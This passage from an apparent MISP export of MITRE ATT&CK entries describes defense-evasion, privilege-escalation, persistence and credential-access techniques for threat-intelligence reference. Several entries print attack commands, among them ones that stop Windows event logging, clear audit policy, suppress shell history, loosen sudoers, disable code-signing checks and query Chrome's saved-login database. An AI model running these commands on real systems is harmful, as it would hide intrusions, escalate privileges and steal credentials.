Adversaries may target system-wide logging or just that of a particular application. For example, the EventLog service may be disabled using the following PowerShell line: <code>Stop-Service -Name EventLog</code>.(Citation: Disable_Win_Event_Logging) Additionally, adversaries may use <code>auditpol</code> and its sub-commands in a command prompt to disable auditing or clear the audit policy. To enable or disable a specified setting or audit category, adversaries may use the <code>/success</code> or <code>/failure</code> parameters. For example, <code>auditpol /set /category:”Account Logon” /success:disable /failure:disable</code> turns off auditing for the Account Logon category.(Citation: auditpol.exe_STRONTIC)(Citation: T1562.002_redcanaryco) To clear the audit policy, adversaries may run the following lines: <code>auditpol /clear /y</code> or <code>auditpol /remove /allusers</code>.(Citation: T1562.002_redcanaryco)

By disabling Windows event logging, adversaries can operate while leaving less evidence of a compromise behind.

The tag is: misp-galaxy:mitre-attack-pattern="Disable Windows Event Logging - T1562.002"

Table 3225. Table References
Links
https://attack.mitre.org/techniques/T1562/002
https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/
https://www.coretechnologies.com/blog/windows-services/eventlog/
https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/audit-policy
https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/advanced-security-audit-policy-settings
https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/auditpol
https://dmcxblue.gitbook.io/red-team-notes-2-0/red-team-techniques/defense-evasion/t1562-impair-defenses/disable-windows-event-logging
https://strontic.github.io/xcyclopedia/library/auditpol.exe-214E0EA1F7F7C27C82D23F183F9D23F1.html
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md
https://www.hackingarticles.in/defense-evasion-windows-event-logging-t1562-002/
https://svch0st.medium.com/event-log-tampering-part-1-disrupting-the-eventlog-service-8d4b7d67335c

Impair Command History Logging - T1562.003

Adversaries may impair command history logging to hide commands they run on a compromised system. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they’ve done.

On Linux and macOS, command history is tracked in a file pointed to by the environment variable <code>HISTFILE</code>. When a user logs off a system, this information is flushed to a file in the user’s home directory called <code>~/.bash_history</code>. The <code>HISTCONTROL</code> environment variable keeps track of what should be saved by the <code>history</code> command and eventually into the <code>~/.bash_history</code> file when a user logs out. <code>HISTCONTROL</code> does not exist by default on macOS, but can be set by the user and will be respected.

Adversaries may clear the history environment variable (<code>unset HISTFILE</code>) or set the command history size to zero (<code>export HISTFILESIZE=0</code>) to prevent logging of commands. Additionally, <code>HISTCONTROL</code> can be configured to ignore commands that start with a space by simply setting it to "ignorespace". <code>HISTCONTROL</code> can also be set to ignore duplicate commands by setting it to "ignoredups". In some Linux systems, this is set by default to "ignoreboth" which covers both of the previous examples. This means that “ ls” will not be saved, but “ls” would be saved by history. Adversaries can abuse this to operate without leaving traces by simply prepending a space to all of their terminal commands.

On Windows systems, the <code>PSReadLine</code> module tracks commands used in all PowerShell sessions and writes them to a file (<code>$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt</code> by default). Adversaries may change where these logs are saved using <code>Set-PSReadLineOption -HistorySavePath {File Path}</code>. This will cause <code>ConsoleHost_history.txt</code> to stop receiving logs. Additionally, it is possible to turn off logging to this file using the PowerShell command <code>Set-PSReadlineOption -HistorySaveStyle SaveNothing</code>.(Citation: Microsoft PowerShell Command History)(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics)

The tag is: misp-galaxy:mitre-attack-pattern="Impair Command History Logging - T1562.003"

Table 3226. Table References
Links
https://attack.mitre.org/techniques/T1562/003
https://capec.mitre.org/data/definitions/13.html
https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_history?view=powershell-7
https://community.sophos.com/products/intercept/early-access-program/f/live-discover-response-queries/121529/live-discover---powershell-command-audit
https://community.sophos.com/products/malware/b/blog/posts/powershell-command-history-forensics

Bypass User Account Control - T1548.002

Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action. (Citation: TechNet How UAC Works)

If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) objects without prompting the user through the UAC notification box. (Citation: TechNet Inside UAC) (Citation: MSDN COM Elevation) An example of this is use of [Rundll32](https://attack.mitre.org/techniques/T1218/011) to load a specifically crafted DLL which loads an auto-elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.(Citation: Davidson Windows)

Many methods have been discovered to bypass UAC. The Github readme page for UACME contains an extensive list of methods(Citation: Github UACMe) that have been discovered and implemented, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:

<code>eventvwr.exe</code> can auto-elevate and execute a specified binary or script.(Citation: enigma0x3 Fileless UAC Bypass)(Citation: Fortinet Fareit)

Another bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.(Citation: SANS UAC Bypass)

The tag is: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002"

Table 3227. Table References
Links
https://attack.mitre.org/techniques/T1548/002
https://technet.microsoft.com/en-us/itpro/windows/keep-secure/how-user-account-control-works
https://technet.microsoft.com/en-US/magazine/2009.07.uac.aspx
https://msdn.microsoft.com/en-us/library/ms679687.aspx
http://www.pretentiousname.com/misc/win7_uac_whitelist2.html
https://github.com/hfiref0x/UACME
https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
https://blog.fortinet.com/2016/12/16/malicious-macro-bypasses-uac-to-elevate-privilege-for-fareit-malware
http://pen-testing.sans.org/blog/pen-testing/2013/08/08/psexec-uac-bypass
https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/
https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/

User Activity Based Checks - T1497.002

Adversaries may employ various user activity checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)

Adversaries may search for user activity on the host based on variables such as the speed/frequency of mouse movements and clicks (Citation: Sans Virtual Jan 2016) , browser history, cache, bookmarks, or number of files in common directories such as home or the desktop. Other methods may rely on specific user interaction with the system before the malicious code is activated, such as waiting for a document to close before activating a macro (Citation: Unit 42 Sofacy Nov 2018) or waiting for a user to double click on an embedded image to activate.(Citation: FireEye FIN7 April 2017)

The tag is: misp-galaxy:mitre-attack-pattern="User Activity Based Checks - T1497.002"

Table 3228. Table References
Links
https://attack.mitre.org/techniques/T1497/002
https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html

Cloud Instance Metadata API - T1552.005

Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data.

Most cloud service providers support a Cloud Instance Metadata API which is a service provided to running virtual instances that allows applications to access information about the running virtual instance. Available information generally includes name, security group, and additional metadata including sensitive data such as credentials and UserData scripts that may contain additional secrets. The Instance Metadata API is provided as a convenience to assist in managing applications and is accessible by anyone who can access the instance.(Citation: AWS Instance Metadata API) A cloud metadata API has been used in at least one high profile compromise.(Citation: Krebs Capital One August 2019)

If adversaries have a presence on the running virtual instance, they may query the Instance Metadata API directly to identify credentials that grant access to additional resources. Additionally, attackers may exploit a Server-Side Request Forgery (SSRF) vulnerability in a public facing web proxy that allows the attacker to gain access to the sensitive information via a request to the Instance Metadata API.(Citation: RedLock Instance Metadata API 2018)

The de facto standard across cloud service providers is to host the Instance Metadata API at <code>http[:]//169.254.169.254</code>.

The tag is: misp-galaxy:mitre-attack-pattern="Cloud Instance Metadata API - T1552.005"

Table 3229. Table References
Links
https://attack.mitre.org/techniques/T1552/005
https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html
https://krebsonsecurity.com/2019/08/what-we-can-learn-from-the-capital-one-hack/
https://redlock.io/blog/instance-metadata-api-a-modern-day-trojan-horse

Exfiltration to Cloud Storage - T1567.002

Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and control channel. Cloud storage services allow for the storage, edit, and retrieval of data from a remote cloud storage server over the Internet.

Examples of cloud storage services include Dropbox and Google Docs. Exfiltration to these cloud storage services can provide a significant amount of cover to the adversary if hosts within the network are already communicating with the service.

The tag is: misp-galaxy:mitre-attack-pattern="Exfiltration to Cloud Storage - T1567.002"

Table 3230. Table References
Links
https://attack.mitre.org/techniques/T1567/002

Sudo and Sudo Caching - T1548.003

Adversaries may perform sudo caching and/or use the suoders file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.

Within Linux and MacOS systems, sudo (sometimes referred to as "superuser do") allows users to perform commands from terminals with elevated privileges and to control who can perform these commands on the system. The <code>sudo</code> command "allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments."(Citation: sudo man page 2018) Since sudo was made for the system administrator, it has some useful configuration features such as a <code>timestamp_timeout</code>, which is the amount of time in minutes between instances of <code>sudo</code> before it will re-prompt for a password. This is because <code>sudo</code> has the ability to cache credentials for a period of time. Sudo creates (or touches) a file at <code>/var/db/sudo</code> with a timestamp of when sudo was last run to determine this timeout. Additionally, there is a <code>tty_tickets</code> variable that treats each new tty (terminal session) in isolation. This means that, for example, the sudo timeout of one tty will not affect another tty (you will have to type the password again).

The sudoers file, <code>/etc/sudoers</code>, describes which users can run which commands and from which terminals. This also describes which commands users can run as other users or groups. This provides the principle of least privilege such that users are running in their lowest possible permissions for most of the time and only elevate to other users or permissions as needed, typically by prompting for a password. However, the sudoers file can also specify when to not prompt users for passwords with a line like <code>user1 ALL=(ALL) NOPASSWD: ALL</code> (Citation: OSX.Dok Malware). Elevated privileges are required to edit this file though.

Adversaries can also abuse poor configurations of these mechanisms to escalate privileges without needing the user’s password. For example, <code>/var/db/sudo</code>'s timestamp can be monitored to see if it falls within the <code>timestamp_timeout</code> range. If it does, then malware can execute sudo commands without needing to supply the user’s password. Additional, if <code>tty_tickets</code> is disabled, adversaries can do this from any tty for that user.

In the wild, malware has disabled <code>tty_tickets</code> to potentially make scripting easier by issuing <code>echo \'Defaults !tty_tickets\' >> /etc/sudoers</code> (Citation: cybereason osx proton). In order for this change to be reflected, the malware also issued <code>killall Terminal</code>. As of macOS Sierra, the sudoers file has <code>tty_tickets</code> enabled by default.

The tag is: misp-galaxy:mitre-attack-pattern="Sudo and Sudo Caching - T1548.003"

Table 3231. Table References
Links
https://attack.mitre.org/techniques/T1548/003
https://www.sudo.ws/
https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/
https://www.cybereason.com/blog/labs-proton-b-what-this-mac-malware-actually-does

Credentials from Web Browsers - T1555.003

Adversaries may acquire credentials from web browsers by reading files specific to the target browser.(Citation: Talos Olympic Destroyer 2018) Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store; however, methods exist to extract plaintext credentials from web browsers.

For example, on Windows systems, encrypted credentials may be obtained from Google Chrome by reading a database file, <code>AppData\Local\Google\Chrome\User Data\Default\Login Data</code> and executing a SQL query: <code>SELECT action_url, username_value, password_value FROM logins;</code>. The plaintext password can then be obtained by passing the encrypted credentials to the Windows API function <code>CryptUnprotectData</code>, which uses the victim’s cached logon credentials as the decryption key. (Citation: Microsoft CryptUnprotectData April 2018)

Adversaries have executed similar procedures for common web browsers such as FireFox, Safari, Edge, etc.(Citation: Proofpoint Vega Credential Stealer May 2018)(Citation: FireEye HawkEye Malware July 2017) Windows stores Internet Explorer and Microsoft Edge credentials in Credential Lockers managed by the [Windows Credential Manager](https://attack.mitre.org/techniques/T1555/004).

Adversaries may also acquire credentials by searching web browser process memory for patterns that commonly match credentials.(Citation: GitHub Mimikittenz July 2016)

After acquiring credentials from web browsers, adversaries may attempt to recycle the credentials across different systems and/or accounts in order to expand access. This can result in significantly furthering an adversary’s objective in cases where credentials gained from web browsers overlap with privileged accounts (e.g. domain administrator).

The tag is: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003"

Table 3232. Table References
Links
https://attack.mitre.org/techniques/T1555/003
https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
https://docs.microsoft.com/en-us/windows/desktop/api/dpapi/nf-dpapi-cryptunprotectdata
https://www.proofpoint.com/us/threat-insight/post/new-vega-stealer-shines-brightly-targeted-campaign
https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html
https://github.com/putterpanda/mimikittenz

Code Signing Policy Modification - T1553.006

Adversaries may modify code signing policies to enable execution of unsigned or self-signed code. Code signing provides a level of authenticity on a program from a developer and a guarantee that the program has not been tampered with. Security controls can include enforcement mechanisms to ensure that only valid, signed code can be run on an operating system.

Some of these security controls may be enabled by default, such as Driver Signature Enforcement (DSE) on Windows or System Integrity Protection (SIP) on macOS.(Citation: Microsoft DSE June 2017)(Citation: Apple Disable SIP) Other such controls may be disabled by default but are configurable through application controls, such as only allowing signed Dynamic-Link Libraries (DLLs) to execute on a system. Since it can be useful for developers to modify default signature enforcement policies during the development and testing of applications, disabling of these features may be possible with elevated permissions.(Citation: Microsoft Unsigned Driver Apr 2017)(Citation: Apple Disable SIP)

Adversaries may modify code signing policies in a number of ways, including through use of command-line or GUI utilities, [Modify Registry](https://attack.mitre.org/techniques/T1112), rebooting the computer in a debug/recovery mode, or by altering the value of variables in kernel memory.(Citation: Microsoft TESTSIGNING Feb 2021)(Citation: Apple Disable SIP)(Citation: FireEye HIKIT Rootkit Part 2)(Citation: GitHub Turla Driver Loader) Examples of commands that can modify the code signing policy of a system include <code>bcdedit.exe -set TESTSIGNING ON</code> on Windows and <code>csrutil disable</code> on macOS.(Citation: Microsoft TESTSIGNING Feb 2021)(Citation: Apple Disable SIP) Depending on the implementation, successful modification of a signing policy may require reboot of the compromised system. Additionally, some implementations can introduce visible artifacts for the user (ex: a watermark in the corner of the screen stating the system is in Test Mode). Adversaries may attempt to remove such artifacts.(Citation: F-Secure BlackEnergy 2014)

To gain access to kernel memory to modify variables related to signature checks, such as modifying <code>g_CiOptions</code> to disable Driver Signature Enforcement, adversaries may conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) using a signed, but vulnerable driver.(Citation: Unit42 AcidBox June 2020)(Citation: GitHub Turla Driver Loader)

The tag is: misp-galaxy:mitre-attack-pattern="Code Signing Policy Modification - T1553.006"

Table 3233. Table References
Links
https://attack.mitre.org/techniques/T1553/006
https://docs.microsoft.com/en-us/previous-versions/windows/hardware/design/dn653559(v=vs.85)?redirectedfrom=MSDN
https://developer.apple.com/documentation/security/disabling_and_enabling_system_integrity_protection
https://docs.microsoft.com/en-us/windows-hardware/drivers/install/installing-an-unsigned-driver-during-development-and-test
https://docs.microsoft.com/en-us/windows-hardware/drivers/install/the-testsigning-boot-configuration-option
https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-2.html
https://github.com/hfiref0x/TDL
https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf
https://unit42.paloaltonetworks.com/acidbox-rare-malware/

Unix Shell Configuration Modification - T1546.004

Adversaries may establish persistence through executing malicious commands triggered by a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s execute several configuration scripts at different points throughout the session based on events. For example, when a user opens a command-line interface or remotely logs in (such as via SSH) a login shell is initiated. The login shell executes scripts from the system (<code>/etc</code>) and the user’s home directory (<code>~/</code>) to configure the environment. All login shells on a system use /etc/profile when initiated. These configuration scripts run at the permission level of their directory and are often used to set environment variables, create aliases, and customize the user’s environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately.

Adversaries may attempt to establish persistence by inserting commands into scripts automatically executed by shells. Using bash as an example, the default shell for most GNU/Linux systems, adversaries may add commands that launch malicious binaries into the <code>/etc/profile</code> and <code>/etc/profile.d</code> files.(Citation: intezer-kaiji-malware)(Citation: bencane blog bashrc) These files typically require root permissions to modify and are executed each time any shell on a system launches. For user level permissions, adversaries can insert malicious commands into <code>~/.bash_profile</code>, <code>~/.bash_login</code>, or <code>~/.profile</code> which are sourced when a user opens a command-line interface or connects remotely.(Citation: anomali-rocke-tactics)(Citation: Linux manual bash invocation) Since the system only executes the first existing file in the listed order, adversaries have used <code>~/.bash_profile</code> to ensure execution. Adversaries have also leveraged the <code>~/.bashrc</code> file which is additionally executed if the connection is established remotely or an additional interactive shell is opened, such as a new tab in the command-line interface.(Citation: Tsunami)(Citation: anomali-rocke-tactics)(Citation: anomali-linux-rabbit)(Citation: Magento) Some malware targets the termination of a program to trigger execution, adversaries can use the <code>~/.bash_logout</code> file to execute malicious commands at the end of a session.

For macOS, the functionality of this technique is similar but may leverage zsh, the default shell for macOS 10.15+. When the Terminal.app is opened, the application launches a zsh login shell and a zsh interactive shell. The login shell configures the system environment using <code>/etc/profile</code>, <code>/etc/zshenv</code>, <code>/etc/zprofile</code>, and <code>/etc/zlogin</code>.(Citation: ScriptingOSX zsh)(Citation: PersistentJXA_leopitt)(Citation: code_persistence_zsh)(Citation: macOS MS office sandbox escape) The login shell then configures the user environment with <code>~/.zprofile</code> and <code>~/.zlogin</code>. The interactive shell uses the <code>~/.zshrc</code> to configure the user environment. Upon exiting, <code>/etc/zlogout</code> and <code>~/.zlogout</code> are executed. For legacy programs, macOS executes <code>/etc/bashrc</code> on startup.

The tag is: misp-galaxy:mitre-attack-pattern="Unix Shell Configuration Modification - T1546.004"

Table 3234. Table References
Links
https://attack.mitre.org/techniques/T1546/004
https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
https://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
https://wiki.archlinux.org/index.php/Bash#Invocation
https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
https://objective-see.com/blog/blog_0x48.html

Elevated Execution with Prompt - T1548.004

Adversaries may leverage the <code>AuthorizationExecuteWithPrivileges</code> API to escalate privileges by prompting the user for credentials.(Citation: AppleDocs AuthorizationExecuteWithPrivileges) The purpose of this API is to give application developers an easy way to perform operations with root privileges, such as for application installation or updating. This API does not validate that the program requesting root privileges comes from a reputable source or has been maliciously modified.

Although this API is deprecated, it still fully functions in the latest releases of macOS. When calling this API, the user will be prompted to enter their credentials but no checks on the origin or integrity of the program are made. The program calling the API may also load world writable files which can be modified to perform malicious behavior with elevated privileges.

Adversaries may abuse <code>AuthorizationExecuteWithPrivileges</code> to obtain root privileges in order to install malicious software on victims and install persistence mechanisms.(Citation: Death by 1000 installers; it’s all broken!)(Citation: Carbon Black Shlayer Feb 2019)(Citation: OSX Coldroot RAT) This technique may be combined with [Masquerading](https://attack.mitre.org/techniques/T1036) to trick the user into granting escalated privileges to malicious code.(Citation: Death by 1000 installers; it’s all broken!)(Citation: Carbon Black Shlayer Feb 2019) This technique has also been shown to work by modifying legitimate programs present on the machine that make use of this API.(Citation: Death by 1000 installers; it’s all broken!)

The tag is: misp-galaxy:mitre-attack-pattern="Elevated Execution with Prompt - T1548.004"

Table 3235. Table References
Links
https://attack.mitre.org/techniques/T1548/004
https://developer.apple.com/documentation/security/1540038-authorizationexecutewithprivileg
https://speakerdeck.com/patrickwardle/defcon-2017-death-by-1000-installers-its-all-broken?slide=8
https://www.carbonblack.com/2019/02/12/tau-threat-intelligence-notification-new-macos-malware-variant-of-shlayer-osx-discovered/
https://objective-see.com/blog/blog_0x2A.html

Application or System Exploitation - T1499.004

Adversaries may exploit software vulnerabilities that can cause an application or system to crash and deny availability to users. (Citation: Sucuri BIND9 August 2015) Some systems may automatically restart critical applications and services when crashes occur, but they can likely be re-exploited to cause a persistent DoS condition.

The tag is: misp-galaxy:mitre-attack-pattern="Application or System Exploitation - T1499.004"

Table 3236. Table References
Links
https://attack.mitre.org/techniques/T1499/004
https://blog.sucuri.net/2015/08/bind9-denial-of-service-exploit-in-the-wild.html

Kernel Modules and Extensions - T1547.006

Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system. (Citation: Linux Kernel Programming)

When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0). (Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors and enabling root access to non-privileged users. (Citation: iDefense Rootkit Overview)

Kernel extensions, also called kext, are used for macOS to load functionality onto a system similar to LKMs for Linux. They are loaded and unloaded through <code>kextload</code> and <code>kextunload</code> commands. Since macOS Catalina 10.15, kernel extensions have been deprecated on macOS systems.(Citation: Apple Kernel Extension Deprecation)

Adversaries can use LKMs and kexts to covertly persist on a system and elevate privileges. Examples have been found in the wild and there are some open source projects. (Citation: Volatility Phalanx2) (Citation: CrowdStrike Linux Rootkit) (Citation: GitHub Reptile) (Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle) (Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir) (Citation: Trend Micro Skidmap)

The tag is: misp-galaxy:mitre-attack-pattern="Kernel Modules and Extensions - T1547.006"

Table 3237. Table References
Links
https://attack.mitre.org/techniques/T1547/006
https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
http://www.megasecurity.org/papers/Rootkits.pdf
https://developer.apple.com/support/kernel-extensions/
https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
https://github.com/f0rb1dd3n/Reptile
https://github.com/m0nad/Diamorphine
https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
http://tldp.org/HOWTO/Module-HOWTO/x197.html
https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf

Services Registry Permissions Weakness - T1574.011

Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under <code>HKLM\SYSTEM\CurrentControlSet\Services</code>. The information stored under a service’s Registry keys can be manipulated to modify a service’s execution parameters through tools such as the service controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)

If the permissions for users and groups are not properly set and allow access to the Registry keys for a service, adversaries may change the service’s binPath/ImagePath to point to a different executable under their control. When the service starts or is restarted, then the adversary-controlled program will execute, allowing the adversary to establish persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService).

Adversaries may also alter other Registry keys in the service’s Registry tree. For example, the <code>FailureCommand</code> key may be changed so that the service is executed in an elevated context anytime the service fails or is intentionally corrupted.(Citation: Kansa Service related collectors)(Citation: Tweet Registry Perms Weakness)

The <code>Performance</code> key contains the name of a driver service’s performance DLL and the names of several exported functions in the DLL.(Citation: microsoft_services_registry_tree) If the <code>Performance</code> key is not already present and if an adversary-controlled user has the <code>Create Subkey</code> permission, adversaries may create the <code>Performance</code> key in the service’s Registry tree to point to a malicious DLL.(Citation: insecure_reg_perms)

Adversaries may also add the <code>Parameters</code> key, which stores driver-specific data, or other custom subkeys for their malicious services to establish persistence or enable other malicious activities.(Citation: microsoft_services_registry_tree)(Citation: troj_zegost) Additionally, If adversaries launch their malicious services using svchost.exe, the service’s file may be identified using <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\servicename\Parameters\ServiceDll</code>.(Citation: malware_hides_service)

The tag is: misp-galaxy:mitre-attack-pattern="Services Registry Permissions Weakness - T1574.011"

Table 3238. Table References
Links
https://attack.mitre.org/techniques/T1574/011
https://capec.mitre.org/data/definitions/478.html
https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry-key-security-and-access-rights?redirectedfrom=MSDN
https://www.bleepingcomputer.com/tutorials/how-malware-hides-as-a-service/
https://trustedsignal.blogspot.com/2014/05/kansa-service-related-collectors-and.html
https://twitter.com/r0wdy_/status/936365549553991680
https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
https://itm4n.github.io/windows-registry-rpceptmapper-eop/
https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns

Component Object Model Hijacking - T1546.015

Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects. COM is a system within Windows to enable interaction between software components through the operating system.(Citation: Microsoft Component Object Model) References to various COM objects are stored in the Registry.

Adversaries can use the COM system to insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means for persistence. Hijacking a COM object requires a change in the Registry to replace a reference to a legitimate system component which may cause that component to not work when executed. When that system component is executed through normal system operation the adversary’s code will be executed instead.(Citation: GDATA COM Hijacking) An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to break noticeable functionality within the system as to avoid system instability that could lead to detection.

The tag is: misp-galaxy:mitre-attack-pattern="Component Object Model Hijacking - T1546.015"

Table 3239. Table References
Links
https://attack.mitre.org/techniques/T1546/015
https://msdn.microsoft.com/library/ms694363.aspx
https://blog.gdatasoftware.com/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence
https://www.elastic.co/blog/how-hunt-detecting-persistence-evasion-com

Deobfuscate/Decode Files or Information - T1140

Adversaries may use [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.

One such example is use of [certutil](https://attack.mitre.org/software/S0160) to decode a remote access tool portable executable file that has been hidden inside a certificate file. (Citation: Malwarebytes Targeted Attack against Saudi Arabia) Another example is using the Windows <code>copy /b</code> command to reassemble binary fragments into a malicious payload. (Citation: Carbon Black Obfuscation Sept 2016)

Sometimes a user’s action may be required to open it for deobfuscation or decryption as part of [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016)

The tag is: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140"

Table 3240. Table References
Links
https://attack.mitre.org/techniques/T1140
https://blog.malwarebytes.com/cybercrime/social-engineering-cybercrime/2017/03/new-targeted-attack-saudi-arabia-government/
https://www.carbonblack.com/2016/09/23/security-advisory-variants-well-known-adware-families-discovered-include-sophisticated-obfuscation-techniques-previously-associated-nation-state-attacks/
https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/

Obtain domain/IP registration information - T1251

For a computing resource to be accessible to the public, domain names and IP addresses must be registered with an authorized organization. (Citation: Google Domains WHOIS) (Citation: FunAndSun2012) (Citation: Scasny2015)

The tag is: misp-galaxy:mitre-attack-pattern="Obtain domain/IP registration information - T1251"

Table 3241. Table References
Links
https://attack.mitre.org/techniques/T1251

Assign KITs/KIQs into categories - T1228

Leadership organizes Key Intelligence Topics (KITs) and Key Intelligence Questions (KIQs) into three types of categories and creates more if necessary. An example of a description of key players KIT would be when an adversary assesses the cyber defensive capabilities of a nation-state threat actor. (Citation: Herring1999)

The tag is: misp-galaxy:mitre-attack-pattern="Assign KITs/KIQs into categories - T1228"

Table 3242. Table References
Links
